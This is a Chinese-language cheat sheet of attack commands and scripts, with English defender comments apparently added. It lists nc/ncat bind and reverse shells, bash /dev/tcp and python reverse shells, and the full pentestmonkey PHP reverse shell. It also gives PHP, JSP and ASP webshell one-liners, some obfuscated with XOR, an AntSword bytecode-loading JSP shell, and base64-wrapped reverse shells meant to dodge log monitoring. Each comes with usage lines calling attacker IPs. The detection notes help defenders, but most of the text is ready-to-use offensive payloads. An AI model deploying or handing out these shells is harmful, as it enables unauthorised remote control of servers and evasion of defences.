攻击脚本或命令
攻击脚本或命令
正向shell
nc
-
服务器监听端口5000
# -e hands the accepted connection an unauthenticated, unencrypted /bin/bash on the listening host.
# Telemetry to alert on: nc/ncat started with -e/-c/--exec, or a shell whose parent process is nc.
nc -lvvp 5000 -e /bin/bash -
攻击主机进行连接
# Client side of the bind shell: a plain TCP connect; everything typed travels in cleartext.
nc -vv 192.168.194.152 5000 -
连接成功后在攻击主机执行bash命令即可
ncat
-
服务器监听端口5000
# ncat equivalent of the nc bind shell; --keep-open keeps listening after a client disconnects, so the exposed shell outlives a single session.
ncat --exec "/bin/bash" -l 5000 --keep-open -
攻击主机进行连接
# Client side of the ncat bind shell.
ncat 192.168.194.152 5000 -
连接成功后在攻击主机执行bash命令即可
反弹shell
nc(linux)
-
攻击主机上监听端口5000
# Attacker-side listener. On the victim the corresponding artefact is an outbound TCP connection made by a shell process to this port.
nc -lvvp 5000 -
服务器反向连接攻击主机
bash -c 'exec bash -i &>/dev/tcp/192.168.194.160/5000 <&1'
或者
# /dev/tcp is a bash builtin pseudo-device, so no nc binary is required: bash itself opens the outbound socket.
# Detection: "bash -i" with redirections to /dev/tcp in command-line telemetry; outbound connects originating from a bash process.
bash -i >& /dev/tcp/192.168.194.160/5000 0>&1 -
在攻击主机上执行bash命令
python反弹shell
GitHub - infodox/python-pty-shells:Python PTY 后门 - 完整的 PTY 或什么都没有!
# Python is only a launcher here: os.system() re-enters bash and the /dev/tcp form above does the work, so python -> bash process lineage is the signal.
import os;os.system('bash -i >& /dev/tcp/192.168.194.152/8080 0>&1')
php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0); // no script time limit: the relay loop below runs until the socket or the shell closes
$VERSION = "1.0";
$ip = '192.168.194.160'; // You have changed this
$port = 8000; // And this
$chunk_size = 1400; // bytes moved per fread() in the relay loop
$write_a = null; // stream_select() is only asked about readable streams, so the write/error sets stay null
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i'; // command line given to proc_open(): three recon commands, then an interactive /bin/sh
$daemon = 0; // set to 1 only if the fork/setsid below succeeds (see printit())
$debug = 0; // 1 echoes every chunk relayed in either direction via printit()
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
//
// Defender note: pcntl_fork()/posix_setsid() invoked from a web-served PHP
// file are a strong indicator on their own; listing them in php.ini
// disable_functions removes this stage entirely (the script already expects
// that and carries on without it).
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
// (umask 0: files the child shell creates get exactly the mode the creator asks for, possibly world-writable)
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
// Outbound TCP from the web-server process to $ip:$port with a 30 s connect timeout.
// This is the stage that egress filtering on the web tier (deny by default,
// allow-list destinations) stops; a connect failure exits before any shell is spawned.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
// proc_open() runs $shell as a child of the PHP worker with all three stdio
// streams piped back here. The resulting process tree (web server / php-fpm
// -> sh -> uname/w/id) is the usual EDR detection point for this family.
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
// Relay loop: socket -> shell stdin, shell stdout/stderr -> socket, until either side closes.
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
// (null timeout = block indefinitely; the return value is never checked,
// so a select() failure simply falls through to the in_array() tests below)
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
// Tear down: close the socket and all three pipes, then reap the child.
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
//
// NOTE(review): $daemon is a global, but this function never declares
// `global $daemon`, so inside it $daemon is always undefined (falsy) and the
// message is printed regardless of whether daemonisation succeeded. When the
// file is served by a web server that output typically lands in the HTTP
// response body, which is one of the artefacts a responder can look for.
function printit ($string) {
if (!$daemon) {
print "$string
";
}
}
?>
RCE
php
<?php // Webshell: the "cmd" query parameter goes straight into system() -- no auth, no validation. Hunt for system()/exec()/passthru() applied to request superglobals in the web root.
system($_GET["cmd"]);?>
或者更隐蔽(混淆过)的脚本:
<?=/* backtick operator (shell_exec) on query parameter 0 */`$_GET[0]`?>
用法:http://target.com/path/to/shell.php?0=command
<?=/* same as above, on POST field 0 */`$_POST[0]`?>
用法:curl -X POST http://target.com/path/to/shell.php -d "0=command"
<?=/* same, on the "_" field of GET, POST or cookie ($_REQUEST) */`{$_REQUEST['_']}`?>
用法:http://target.com/path/to/shell.php?_=command 或 curl -X POST http://target.com/path/to/shell.php -d "_=command"
<?=/* obfuscated form of the one-liner above: the chr()/XOR arithmetic only rebuilds the strings "_GET" and "0", so this still runs $_GET['0'] through backticks. No "$_GET"/"system" literal appears, so signature scanners need to key on chr()/^ string building and variable-variables (${$_}) instead. */$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
用法:http://target.com/path/to/shell.php?0=command
<?php /* XOR arithmetic rebuilds "GET"; ${'_'.$_} is then $_GET, and $_GET['_']($_GET['__']) calls whatever function the "_" parameter names with "__" as its single argument -- an arbitrary function call, as the usage line below states */ $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
用法: http://target.com/path/to/shell.php?_=function&__=argument或http://target.com/path/to/shell.php?_=system&__=ls
jsp
<%/* Runtime.exec() on the "cmd" parameter; the returned Process is discarded, so nothing is written back -- blind command execution */Runtime.getRuntime().exec(request.getParameter("cmd"));%>
js
<script language=VBScript runat=server>' server-side VBScript execute() of the "cmd" request value: runs arbitrary VBScript, not just shell commands
execute request("cmd")</script>
asp/aspx
-
asp一句话木马:
<%' Classic ASP: eval()/execute() run the "value" request parameter as VBScript (two equivalent forms)
eval request ("value")%><% execute(request("value")) %> -
aspx
<%@ Page Language="Jscript" %><% /* JScript.NET eval() of the "value" request item: arbitrary server-side code under the ASP.NET worker identity */ eval(Request.Item["value"]) %>
监听命令
# Attacker-side listener for the reverse shells above.
nc -lvvp 8000
# ncat equivalent; -k keeps the listener open across sessions.
ncat -lvkp 8000
工具及其脚本
中国蚁剑
jsp
<%@ page import="java.io.*"%>
<%-- Defender note: this page is a bytecode-loading webshell. A request
     parameter is base64-decoded and handed straight to ClassLoader.defineClass(),
     so the server executes whatever class the client sends; nothing is
     validated or authenticated. Detection: JSP sources that subclass
     ClassLoader or call defineClass, and runtime class definitions whose
     origin is the servlet container's JSP compiler. --%>
<%!
// ClassLoader subclass that exposes the protected defineClass() so the
// scriptlet below can turn a raw byte[] into a loaded Class.
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
// Defines a class from the given bytecode; with no name argument the class
// name is taken from the bytes themselves.
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
// Base64-decodes str, trying the legacy sun.misc.BASE64Decoder first and
// falling back to java.util.Base64. Both are reached via reflection, which
// avoids a compile-time dependency on either class.
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
// Entry point: the "cmd" parameter carries base64-encoded bytecode. The loaded
// class is instantiated and equals(pageContext) is invoked on it; presumably the
// supplied class overrides equals() and uses the PageContext argument to reach
// the request/response -- confirm against the client tooling.
String cls = request.getParameter("cmd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
口令为cmd
php
<?php /* eval() on the POST "cmd" field; the @ only silences PHP warnings. Detect with eval applied to $_POST/$_REQUEST and the literal "@eval(" pattern in the web root. */ @eval($_POST['cmd']);?>
如果返回为空,则需要在添加数据时使用base64编码
<?php /* same via $_REQUEST (GET, POST or cookie); the unquoted key cmd relies on the undefined-constant-to-string fallback, which PHP 8 no longer permits */ @eval($_REQUEST[cmd]);?>
或者
<?=/* eval() on the "cmd" field of $_REQUEST, using the short echo tag */eval($_REQUEST['cmd']);?>
然后如果是直接在地址栏执行命令就是输入:
cmd=system("ls");
asp
<%@ Page Language="Jscript"%><% /* same as the aspx one-liner above; JScript.NET's "unsafe" mode lifts the restrictions eval() otherwise applies to the evaluated code */ eval(Request.Item["cmd"],"unsafe"); %>
中国菜刀
php
<?php /* identical to the one-liner in the previous section: eval() on the POST "cmd" field with warnings suppressed */ @eval($_POST['cmd']);?>
以上脚本在2016版会出现问题,但可用于2014版
bypass
反弹shell bypass
反弹shell的方法总结(base64绕过等等)_反弹shell base64_J0hnson666的博客-CSDN博客
base64
# base64 wrapping only keeps the literal "/dev/tcp/..." out of naive log greps; the decoded text still runs under bash -i.
# The brace-comma form {echo,...}|{base64,-d}|{bash,-i} (a way of avoiding spaces) is itself a high-signal pattern for command-line monitoring.
bash -c '{echo,命令的base64编码}|{base64,-d}|{bash,-i}'
比如要执行bash -i >& /dev/tcp/192.168.194.152/8080 0>&1,首先获取该命令的base64值
# Produces the base64 string that is substituted into the wrapper on the next command line.
echo "bash -i >& /dev/tcp/192.168.194.152/8080 0>&1"|base64
然后将以上命令的返回值做替换即可:
# Wrapper carrying the encoding produced by the echo above; decodes and runs the same /dev/tcp reverse shell.
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5NC4xNTIvODA4MCAwPiYxCg==}|{base64,-d}|{bash,-i}'
# Same wrapper with a different encoded payload.
bash -c '{echo,YmFzaCAtaT4vZGV2L3RjcC84MS43MC4yNTIuMjEwLzEyMzQ1IDA+JjEK}|{base64,-d}|{bash,-i}'
# Generates a base64 string for the wrapper; note this variant uses > rather than >&, so stderr is not redirected.
echo "bash -i>/dev/tcp/192.168.194.152/12345 0>&1"|base64
# Generates the base64 string used by the wrapper on the next line.
echo "bash -i >& /dev/tcp/81.70.252.210/3333 0>&1"|base64
# Wrapper for the encoding produced by the preceding echo.
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS43MC4yNTIuMjEwLzMzMzMgMD4mMQo=}|{base64,-d}|{bash,-i}'